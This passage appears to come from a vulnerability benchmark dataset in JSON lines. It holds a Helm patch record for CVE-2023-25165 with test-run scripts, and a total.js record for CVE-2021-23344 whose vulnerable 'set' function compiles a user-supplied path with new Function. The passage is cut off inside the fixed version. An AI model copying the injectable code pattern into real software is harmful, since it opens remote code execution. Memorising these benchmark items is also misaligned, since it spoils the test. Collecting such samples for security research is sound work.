currentRelease, upgradedRelease, err\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,43 @@\n+type Install struct {\n+\tcfg *Configuration\n+\n+\tChartPathOptions\n+\n+\tClientOnly bool\n+\tForce bool\n+\tCreateNamespace bool\n+\tDryRun bool\n+\tDisableHooks bool\n+\tReplace bool\n+\tWait bool\n+\tWaitForJobs bool\n+\tDevel bool\n+\tDependencyUpdate bool\n+\tTimeout time.Duration\n+\tNamespace string\n+\tReleaseName string\n+\tGenerateName bool\n+\tNameTemplate string\n+\tDescription string\n+\tOutputDir string\n+\tAtomic bool\n+\tSkipCRDs bool\n+\tSubNotes bool\n+\tDisableOpenAPIValidation bool\n+\tIncludeCRDs bool\n+\t// KubeVersion allows specifying a custom kubernetes version to use and\n+\t// APIVersions allows a manual set of supported API Versions to be passed\n+\t// (for things like templating). These are ignored if ClientOnly is false\n+\tKubeVersion *chartutil.KubeVersion\n+\tAPIVersions chartutil.VersionSet\n+\t// Used by helm template to render charts with .Release.IsUpgrade. Ignored if Dry-Run is false\n+\tIsUpgrade bool\n+\t// Enable DNS lookups when rendering templates\n+\tEnableDNS bool\n+\t// Used by helm template to add the release as part of OutputDir path\n+\t// OutputDir/\n+\tUseReleaseName bool\n+\tPostRenderer postrender.PostRenderer\n+\t// Lock to control raceconditions when the process receives a SIGTERM\n+\tLock sync.Mutex\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,166 @@\n+func (i *Install) RunWithContext(ctx context.Context, chrt *chart.Chart, vals map[string]interface{}) (*release.Release, error) {\n+\t// Check reachability of cluster unless in client-only mode (e.g. `helm template` without `--validate`)\n+\tif !i.ClientOnly {\n+\t\tif err := i.cfg.KubeClient.IsReachable(); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\tif err := i.availableName(); err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\tif err := chartutil.ProcessDependencies(chrt, vals); err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// Pre-install anything in the crd/ directory. We do this before Helm\n+\t// contacts the upstream server and builds the capabilities object.\n+\tif crds := chrt.CRDObjects(); !i.ClientOnly && !i.SkipCRDs && len(crds) > 0 {\n+\t\t// On dry run, bail here\n+\t\tif i.DryRun {\n+\t\t\ti.cfg.Log(\"WARNING: This chart or one of its subcharts contains CRDs. Rendering may fail or contain inaccuracies.\")\n+\t\t} else if err := i.installCRDs(crds); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\tif i.ClientOnly {\n+\t\t// Add mock objects in here so it doesn't use Kube API server\n+\t\t// NOTE(bacongobbler): used for `helm template`\n+\t\ti.cfg.Capabilities = chartutil.DefaultCapabilities.Copy()\n+\t\tif i.KubeVersion != nil {\n+\t\t\ti.cfg.Capabilities.KubeVersion = *i.KubeVersion\n+\t\t}\n+\t\ti.cfg.Capabilities.APIVersions = append(i.cfg.Capabilities.APIVersions, i.APIVersions...)\n+\t\ti.cfg.KubeClient = &kubefake.PrintingKubeClient{Out: ioutil.Discard}\n+\n+\t\tmem := driver.NewMemory()\n+\t\tmem.SetNamespace(i.Namespace)\n+\t\ti.cfg.Releases = storage.Init(mem)\n+\t} else if !i.ClientOnly && len(i.APIVersions) > 0 {\n+\t\ti.cfg.Log(\"API Version list given outside of client only mode, this list will be ignored\")\n+\t}\n+\n+\t// Make sure if Atomic is set, that wait is set as well. This makes it so\n+\t// the user doesn't have to specify both\n+\ti.Wait = i.Wait || i.Atomic\n+\n+\tcaps, err := i.cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// special case for helm template --is-upgrade\n+\tisUpgrade := i.IsUpgrade && i.DryRun\n+\toptions := chartutil.ReleaseOptions{\n+\t\tName: i.ReleaseName,\n+\t\tNamespace: i.Namespace,\n+\t\tRevision: 1,\n+\t\tIsInstall: !isUpgrade,\n+\t\tIsUpgrade: isUpgrade,\n+\t}\n+\tvaluesToRender, err := chartutil.ToRenderValues(chrt, vals, options, caps)\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\trel := i.createRelease(chrt, vals)\n+\n+\tvar manifestDoc *bytes.Buffer\n+\trel.Hooks, manifestDoc, rel.Info.Notes, err = i.cfg.renderResources(chrt, valuesToRender, i.ReleaseName, i.OutputDir, i.SubNotes, i.UseReleaseName, i.IncludeCRDs, i.PostRenderer, i.DryRun, i.EnableDNS)\n+\t// Even for errors, attach this if available\n+\tif manifestDoc != nil {\n+\t\trel.Manifest = manifestDoc.String()\n+\t}\n+\t// Check error from render\n+\tif err != nil {\n+\t\trel.SetStatus(release.StatusFailed, fmt.Sprintf(\"failed to render resource: %s\", err.Error()))\n+\t\t// Return a release with partial data so that the client can show debugging information.\n+\t\treturn rel, err\n+\t}\n+\n+\t// Mark this release as in-progress\n+\trel.SetStatus(release.StatusPendingInstall, \"Initial install underway\")\n+\n+\tvar toBeAdopted kube.ResourceList\n+\tresources, err := i.cfg.KubeClient.Build(bytes.NewBufferString(rel.Manifest), !i.DisableOpenAPIValidation)\n+\tif err != nil {\n+\t\treturn nil, errors.Wrap(err, \"unable to build kubernetes objects from release manifest\")\n+\t}\n+\n+\t// It is safe to use \"force\" here because these are resources currently rendered by the chart.\n+\terr = resources.Visit(setMetadataVisitor(rel.Name, rel.Namespace, true))\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// Install requires an extra validation step of checking that resources\n+\t// don't already exist before we actually create resources. If we continue\n+\t// forward and create the release object with resources that already exist,\n+\t// we'll end up in a state where we will delete those resources upon\n+\t// deleting the release because the manifest will be pointing at that\n+\t// resource\n+\tif !i.ClientOnly && !isUpgrade && len(resources) > 0 {\n+\t\ttoBeAdopted, err = existingResourceConflict(resources, rel.Name, rel.Namespace)\n+\t\tif err != nil {\n+\t\t\treturn nil, errors.Wrap(err, \"rendered manifests contain a resource that already exists. Unable to continue with install\")\n+\t\t}\n+\t}\n+\n+\t// Bail out here if it is a dry run\n+\tif i.DryRun {\n+\t\trel.Info.Description = \"Dry run complete\"\n+\t\treturn rel, nil\n+\t}\n+\n+\tif i.CreateNamespace {\n+\t\tns := &v1.Namespace{\n+\t\t\tTypeMeta: metav1.TypeMeta{\n+\t\t\t\tAPIVersion: \"v1\",\n+\t\t\t\tKind: \"Namespace\",\n+\t\t\t},\n+\t\t\tObjectMeta: metav1.ObjectMeta{\n+\t\t\t\tName: i.Namespace,\n+\t\t\t\tLabels: map[string]string{\n+\t\t\t\t\t\"name\": i.Namespace,\n+\t\t\t\t},\n+\t\t\t},\n+\t\t}\n+\t\tbuf, err := yaml.Marshal(ns)\n+\t\tif err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t\tresourceList, err := i.cfg.KubeClient.Build(bytes.NewBuffer(buf), true)\n+\t\tif err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t\tif _, err := i.cfg.KubeClient.Create(resourceList); err != nil && !apierrors.IsAlreadyExists(err) {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\t// If Replace is true, we need to supercede the last release.\n+\tif i.Replace {\n+\t\tif err := i.replaceRelease(rel); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\t// Store the release in history before continuing (new in Helm 3). We always know\n+\t// that this is a create operation.\n+\tif err := i.cfg.Releases.Create(rel); err != nil {\n+\t\t// We could try to recover gracefully here, but since nothing has been installed\n+\t\t// yet, this is probably safer than trying to continue when we know storage is\n+\t\t// not working.\n+\t\treturn rel, err\n+\t}\n+\trChan := make(chan resultMessage)\n+\tdoneChan := make(chan struct{})\n+\tdefer close(doneChan)\n+\tgo i.performInstall(rChan, rel, toBeAdopted, resources)\n+\tgo i.handleContext(ctx, rChan, doneChan, rel)\n+\tresult := <-rChan\n+\t//start preformInstall go routine\n+\treturn result.r, result.e\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,126 @@\n+func (cfg *Configuration) renderResources(ch *chart.Chart, values chartutil.Values, releaseName, outputDir string, subNotes, useReleaseName, includeCrds bool, pr postrender.PostRenderer, dryRun, enableDNS bool) ([]*release.Hook, *bytes.Buffer, string, error) {\n+\ths := []*release.Hook{}\n+\tb := bytes.NewBuffer(nil)\n+\n+\tcaps, err := cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn hs, b, \"\", err\n+\t}\n+\n+\tif ch.Metadata.KubeVersion != \"\" {\n+\t\tif !chartutil.IsCompatibleRange(ch.Metadata.KubeVersion, caps.KubeVersion.String()) {\n+\t\t\treturn hs, b, \"\", errors.Errorf(\"chart requires kubeVersion: %s which is incompatible with Kubernetes %s\", ch.Metadata.KubeVersion, caps.KubeVersion.String())\n+\t\t}\n+\t}\n+\n+\tvar files map[string]string\n+\tvar err2 error\n+\n+\t// A `helm template` or `helm install --dry-run` should not talk to the remote cluster.\n+\t// It will break in interesting and exotic ways because other data (e.g. discovery)\n+\t// is mocked. It is not up to the template author to decide when the user wants to\n+\t// connect to the cluster. So when the user says to dry run, respect the user's\n+\t// wishes and do not connect to the cluster.\n+\tif !dryRun && cfg.RESTClientGetter != nil {\n+\t\trestConfig, err := cfg.RESTClientGetter.ToRESTConfig()\n+\t\tif err != nil {\n+\t\t\treturn hs, b, \"\", err\n+\t\t}\n+\t\te := engine.New(restConfig)\n+\t\te.EnableDNS = enableDNS\n+\t\tfiles, err2 = e.Render(ch, values)\n+\t} else {\n+\t\tvar e engine.Engine\n+\t\te.EnableDNS = enableDNS\n+\t\tfiles, err2 = e.Render(ch, values)\n+\t}\n+\n+\tif err2 != nil {\n+\t\treturn hs, b, \"\", err2\n+\t}\n+\n+\t// NOTES.txt gets rendered like all the other files, but because it's not a hook nor a resource,\n+\t// pull it out of here into a separate file so that we can actually use the output of the rendered\n+\t// text file. We have to spin through this map because the file contains path information, so we\n+\t// look for terminating NOTES.txt. We also remove it from the files so that we don't have to skip\n+\t// it in the sortHooks.\n+\tvar notesBuffer bytes.Buffer\n+\tfor k, v := range files {\n+\t\tif strings.HasSuffix(k, notesFileSuffix) {\n+\t\t\tif subNotes || (k == path.Join(ch.Name(), \"templates\", notesFileSuffix)) {\n+\t\t\t\t// If buffer contains data, add newline before adding more\n+\t\t\t\tif notesBuffer.Len() > 0 {\n+\t\t\t\t\tnotesBuffer.WriteString(\"\\n\")\n+\t\t\t\t}\n+\t\t\t\tnotesBuffer.WriteString(v)\n+\t\t\t}\n+\t\t\tdelete(files, k)\n+\t\t}\n+\t}\n+\tnotes := notesBuffer.String()\n+\n+\t// Sort hooks, manifests, and partials. Only hooks and manifests are returned,\n+\t// as partials are not used after renderer.Render. Empty manifests are also\n+\t// removed here.\n+\ths, manifests, err := releaseutil.SortManifests(files, caps.APIVersions, releaseutil.InstallOrder)\n+\tif err != nil {\n+\t\t// By catching parse errors here, we can prevent bogus releases from going\n+\t\t// to Kubernetes.\n+\t\t//\n+\t\t// We return the files as a big blob of data to help the user debug parser\n+\t\t// errors.\n+\t\tfor name, content := range files {\n+\t\t\tif strings.TrimSpace(content) == \"\" {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", name, content)\n+\t\t}\n+\t\treturn hs, b, \"\", err\n+\t}\n+\n+\t// Aggregate all valid manifests into one big doc.\n+\tfileWritten := make(map[string]bool)\n+\n+\tif includeCrds {\n+\t\tfor _, crd := range ch.CRDObjects() {\n+\t\t\tif outputDir == \"\" {\n+\t\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", crd.Name, string(crd.File.Data[:]))\n+\t\t\t} else {\n+\t\t\t\terr = writeToFile(outputDir, crd.Filename, string(crd.File.Data[:]), fileWritten[crd.Name])\n+\t\t\t\tif err != nil {\n+\t\t\t\t\treturn hs, b, \"\", err\n+\t\t\t\t}\n+\t\t\t\tfileWritten[crd.Name] = true\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tfor _, m := range manifests {\n+\t\tif outputDir == \"\" {\n+\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", m.Name, m.Content)\n+\t\t} else {\n+\t\t\tnewDir := outputDir\n+\t\t\tif useReleaseName {\n+\t\t\t\tnewDir = filepath.Join(outputDir, releaseName)\n+\t\t\t}\n+\t\t\t// NOTE: We do not have to worry about the post-renderer because\n+\t\t\t// output dir is only used by `helm template`. In the next major\n+\t\t\t// release, we should move this logic to template only as it is not\n+\t\t\t// used by install or upgrade\n+\t\t\terr = writeToFile(newDir, m.Name, m.Content, fileWritten[m.Name])\n+\t\t\tif err != nil {\n+\t\t\t\treturn hs, b, \"\", err\n+\t\t\t}\n+\t\t\tfileWritten[m.Name] = true\n+\t\t}\n+\t}\n+\n+\tif pr != nil {\n+\t\tb, err = pr.Run(b)\n+\t\tif err != nil {\n+\t\t\treturn hs, b, notes, errors.Wrap(err, \"error while running post render on files\")\n+\t\t}\n+\t}\n+\n+\treturn hs, b, notes, nil\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,185 @@\n+func newUpgradeCmd(cfg *action.Configuration, out io.Writer) *cobra.Command {\n+\tclient := action.NewUpgrade(cfg)\n+\tvalueOpts := &values.Options{}\n+\tvar outfmt output.Format\n+\tvar createNamespace bool\n+\n+\tcmd := &cobra.Command{\n+\t\tUse: \"upgrade [RELEASE] [CHART]\",\n+\t\tShort: \"upgrade a release\",\n+\t\tLong: upgradeDesc,\n+\t\tArgs: require.ExactArgs(2),\n+\t\tValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\t\tif len(args) == 0 {\n+\t\t\t\treturn compListReleases(toComplete, args, cfg)\n+\t\t\t}\n+\t\t\tif len(args) == 1 {\n+\t\t\t\treturn compListCharts(toComplete, true)\n+\t\t\t}\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t},\n+\t\tRunE: func(cmd *cobra.Command, args []string) error {\n+\t\t\tclient.Namespace = settings.Namespace()\n+\n+\t\t\t// Fixes #7002 - Support reading values from STDIN for `upgrade` command\n+\t\t\t// Must load values AFTER determining if we have to call install so that values loaded from stdin are are not read twice\n+\t\t\tif client.Install {\n+\t\t\t\t// If a release does not exist, install it.\n+\t\t\t\thistClient := action.NewHistory(cfg)\n+\t\t\t\thistClient.Max = 1\n+\t\t\t\tif _, err := histClient.Run(args[0]); err == driver.ErrReleaseNotFound {\n+\t\t\t\t\t// Only print this to stdout for table output\n+\t\t\t\t\tif outfmt == output.Table {\n+\t\t\t\t\t\tfmt.Fprintf(out, \"Release %q does not exist. Installing it now.\\n\", args[0])\n+\t\t\t\t\t}\n+\t\t\t\t\tinstClient := action.NewInstall(cfg)\n+\t\t\t\t\tinstClient.CreateNamespace = createNamespace\n+\t\t\t\t\tinstClient.ChartPathOptions = client.ChartPathOptions\n+\t\t\t\t\tinstClient.Force = client.Force\n+\t\t\t\t\tinstClient.DryRun = client.DryRun\n+\t\t\t\t\tinstClient.DisableHooks = client.DisableHooks\n+\t\t\t\t\tinstClient.SkipCRDs = client.SkipCRDs\n+\t\t\t\t\tinstClient.Timeout = client.Timeout\n+\t\t\t\t\tinstClient.Wait = client.Wait\n+\t\t\t\t\tinstClient.WaitForJobs = client.WaitForJobs\n+\t\t\t\t\tinstClient.Devel = client.Devel\n+\t\t\t\t\tinstClient.Namespace = client.Namespace\n+\t\t\t\t\tinstClient.Atomic = client.Atomic\n+\t\t\t\t\tinstClient.PostRenderer = client.PostRenderer\n+\t\t\t\t\tinstClient.DisableOpenAPIValidation = client.DisableOpenAPIValidation\n+\t\t\t\t\tinstClient.SubNotes = client.SubNotes\n+\t\t\t\t\tinstClient.Description = client.Description\n+\t\t\t\t\tinstClient.DependencyUpdate = client.DependencyUpdate\n+\t\t\t\t\tinstClient.EnableDNS = client.EnableDNS\n+\n+\t\t\t\t\trel, err := runInstall(args, instClient, valueOpts, out)\n+\t\t\t\t\tif err != nil {\n+\t\t\t\t\t\treturn err\n+\t\t\t\t\t}\n+\t\t\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n+\t\t\t\t} else if err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tif client.Version == \"\" && client.Devel {\n+\t\t\t\tdebug(\"setting version to >0.0.0-0\")\n+\t\t\t\tclient.Version = \">0.0.0-0\"\n+\t\t\t}\n+\n+\t\t\tchartPath, err := client.ChartPathOptions.LocateChart(args[1], settings)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\n+\t\t\tp := getter.All(settings)\n+\t\t\tvals, err := valueOpts.MergeValues(p)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\n+\t\t\t// Check chart dependencies to make sure all are present in /charts\n+\t\t\tch, err := loader.Load(chartPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tif req := ch.Metadata.Dependencies; req != nil {\n+\t\t\t\tif err := action.CheckDependencies(ch, req); err != nil {\n+\t\t\t\t\terr = errors.Wrap(err, \"An error occurred while checking for chart dependencies. You may need to run `helm dependency build` to fetch missing dependencies\")\n+\t\t\t\t\tif client.DependencyUpdate {\n+\t\t\t\t\t\tman := &downloader.Manager{\n+\t\t\t\t\t\t\tOut: out,\n+\t\t\t\t\t\t\tChartPath: chartPath,\n+\t\t\t\t\t\t\tKeyring: client.ChartPathOptions.Keyring,\n+\t\t\t\t\t\t\tSkipUpdate: false,\n+\t\t\t\t\t\t\tGetters: p,\n+\t\t\t\t\t\t\tRepositoryConfig: settings.RepositoryConfig,\n+\t\t\t\t\t\t\tRepositoryCache: settings.RepositoryCache,\n+\t\t\t\t\t\t\tDebug: settings.Debug,\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\tif err := man.Update(); err != nil {\n+\t\t\t\t\t\t\treturn err\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\t// Reload the chart with the updated Chart.lock file.\n+\t\t\t\t\t\tif ch, err = loader.Load(chartPath); err != nil {\n+\t\t\t\t\t\t\treturn errors.Wrap(err, \"failed reloading chart after repo update\")\n+\t\t\t\t\t\t}\n+\t\t\t\t\t} else {\n+\t\t\t\t\t\treturn err\n+\t\t\t\t\t}\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tif ch.Metadata.Deprecated {\n+\t\t\t\twarning(\"This chart is deprecated\")\n+\t\t\t}\n+\n+\t\t\t// Create context and prepare the handle of SIGTERM\n+\t\t\tctx := context.Background()\n+\t\t\tctx, cancel := context.WithCancel(ctx)\n+\n+\t\t\t// Set up channel on which to send signal notifications.\n+\t\t\t// We must use a buffered channel or risk missing the signal\n+\t\t\t// if we're not ready to receive when the signal is sent.\n+\t\t\tcSignal := make(chan os.Signal, 2)\n+\t\t\tsignal.Notify(cSignal, os.Interrupt, syscall.SIGTERM)\n+\t\t\tgo func() {\n+\t\t\t\t<-cSignal\n+\t\t\t\tfmt.Fprintf(out, \"Release %s has been cancelled.\\n\", args[0])\n+\t\t\t\tcancel()\n+\t\t\t}()\n+\n+\t\t\trel, err := client.RunWithContext(ctx, args[0], ch, vals)\n+\t\t\tif err != nil {\n+\t\t\t\treturn errors.Wrap(err, \"UPGRADE FAILED\")\n+\t\t\t}\n+\n+\t\t\tif outfmt == output.Table {\n+\t\t\t\tfmt.Fprintf(out, \"Release %q has been upgraded. Happy Helming!\\n\", args[0])\n+\t\t\t}\n+\n+\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n+\t\t},\n+\t}\n+\n+\tf := cmd.Flags()\n+\tf.BoolVar(&createNamespace, \"create-namespace\", false, \"if --install is set, create the release namespace if not present\")\n+\tf.BoolVarP(&client.Install, \"install\", \"i\", false, \"if a release by this name doesn't already exist, run an install\")\n+\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n+\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an upgrade\")\n+\tf.BoolVar(&client.Recreate, \"recreate-pods\", false, \"performs pods restart for the resource if applicable\")\n+\tf.MarkDeprecated(\"recreate-pods\", \"functionality will no longer be updated. Consult the documentation for other methods to recreate pods\")\n+\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n+\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"disable pre/post upgrade hooks\")\n+\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the upgrade process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n+\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed when an upgrade is performed with install flag enabled. By default, CRDs are installed if not already present, when an upgrade is performed with install flag enabled\")\n+\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n+\tf.BoolVar(&client.ResetValues, \"reset-values\", false, \"when upgrading, reset the values to the ones built into the chart\")\n+\tf.BoolVar(&client.ReuseValues, \"reuse-values\", false, \"when upgrading, reuse the last release's values and merge in any overrides from the command line via --set and -f. If '--reset-values' is specified, this is ignored\")\n+\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, upgrade process rolls back changes made in case of failed upgrade. The --wait flag will be set automatically if --atomic is used\")\n+\tf.IntVar(&client.MaxHistory, \"history-max\", settings.MaxHistory, \"limit the maximum number of revisions saved per release. Use 0 for no limit\")\n+\tf.BoolVar(&client.CleanupOnFail, \"cleanup-on-fail\", false, \"allow deletion of new resources created in this upgrade when upgrade fails\")\n+\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n+\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n+\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n+\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n+\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n+\taddValueOptionsFlags(f, valueOpts)\n+\tbindOutputFlag(cmd, &outfmt)\n+\tbindPostRenderFlag(cmd, &client.PostRenderer)\n+\n+\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\tif len(args) != 2 {\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t}\n+\t\treturn compVersionFlag(args[1], toComplete)\n+\t})\n+\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n+\n+\treturn cmd\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,37 @@\n+func addInstallFlags(cmd *cobra.Command, f *pflag.FlagSet, client *action.Install, valueOpts *values.Options) {\n+\tf.BoolVar(&client.CreateNamespace, \"create-namespace\", false, \"create the release namespace if not present\")\n+\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an install\")\n+\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n+\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"prevent hooks from running during install\")\n+\tf.BoolVar(&client.Replace, \"replace\", false, \"re-use the given name, only if that name is a deleted release which remains in the history. This is unsafe in production\")\n+\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n+\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n+\tf.BoolVarP(&client.GenerateName, \"generate-name\", \"g\", false, \"generate the name (and omit the NAME parameter)\")\n+\tf.StringVar(&client.NameTemplate, \"name-template\", \"\", \"specify template used to name the release\")\n+\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n+\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n+\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n+\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n+\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, the installation process deletes the installation on failure. The --wait flag will be set automatically if --atomic is used\")\n+\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed. By default, CRDs are installed if not already present\")\n+\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n+\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n+\taddValueOptionsFlags(f, valueOpts)\n+\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n+\n+\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\trequiredArgs := 2\n+\t\tif client.GenerateName {\n+\t\t\trequiredArgs = 1\n+\t\t}\n+\t\tif len(args) != requiredArgs {\n+\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n+\t\t}\n+\t\treturn compVersionFlag(args[requiredArgs-1], toComplete)\n+\t})\n+\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25165:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/helm\nrm -rf ./pkg/engine/engine_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -v -timeout 30s -run ^TestRenderWIthDNS$ helm.sh/helm/v3/pkg/engine\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25165:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/helm\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd pkg/engine && go test -timeout 30s -v\n"} {"cve_id": "CVE-2021-23344", "cve_description": "The package total.js before 3.4.8 are vulnerable to Remote Code Execution (RCE) via set.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/totaljs/framework", "patch_url": ["https://github.com/totaljs/framework/commit/c812bbcab8981797d3a1b9993fc42dad3d246f04"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_210_1", "commit": "fcdf74c", "file_path": "utils.js", "start_line": 6606, "end_line": 6631, "snippet": "exports.set = function(obj, path, value) {\n\tvar cachekey = 'S+' + path;\n\n\tif (F.temporary.other[cachekey])\n\t\treturn F.temporary.other[cachekey](obj, value);\n\n\tvar arr = parsepath(path);\n\tvar builder = [];\n\n\tfor (var i = 0; i < arr.length - 1; i++) {\n\t\tvar type = arr[i + 1] ? (REGISARR.test(arr[i + 1]) ? '[]' : '{}') : '{}';\n\t\tvar p = 'w' + (arr[i][0] === '[' ? '' : '.') + arr[i];\n\t\tbuilder.push('if(typeof(' + p + ')!==\\'object\\'||' + p + '==null)' + p + '=' + type + ';');\n\t}\n\n\tvar v = arr[arr.length - 1];\n\tvar ispush = v.lastIndexOf('[]') !== -1;\n\tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n\n\tif ((/__proto__|constructor|prototype/).test(a))\n\t\tthrow new Error('Prototype pollution');\n\n\tvar fn = new Function('w', 'a', 'b', a);\n\tF.temporary.other[cachekey] = fn;\n\tfn(obj, value, path);\n};"}], "fix_func": [{"id": "fix_js_210_1", "commit": "c812bbcab8981797d3a1b9993fc42dad3d246f04", "file_path": "utils.js", "start_line": 6606, "end_line": 6631, "snippet": "exports.set = function(obj, path, value) {\n\tvar cachekey = 'S+' + path;\n\n\tif (F.temporary.other[cachekey])\n\t\treturn F.temporary.other[cachekey](obj, value);\n\n\tvar arr = parsepath(path);\n\tvar builder = [];\n\n\tfor (var i = 0; i < arr.length - 1; i++) {\n\t\tvar type = arr[i + 1] ? (REGISARR.test(arr[i + 1]) ? '[]' : '{}') : 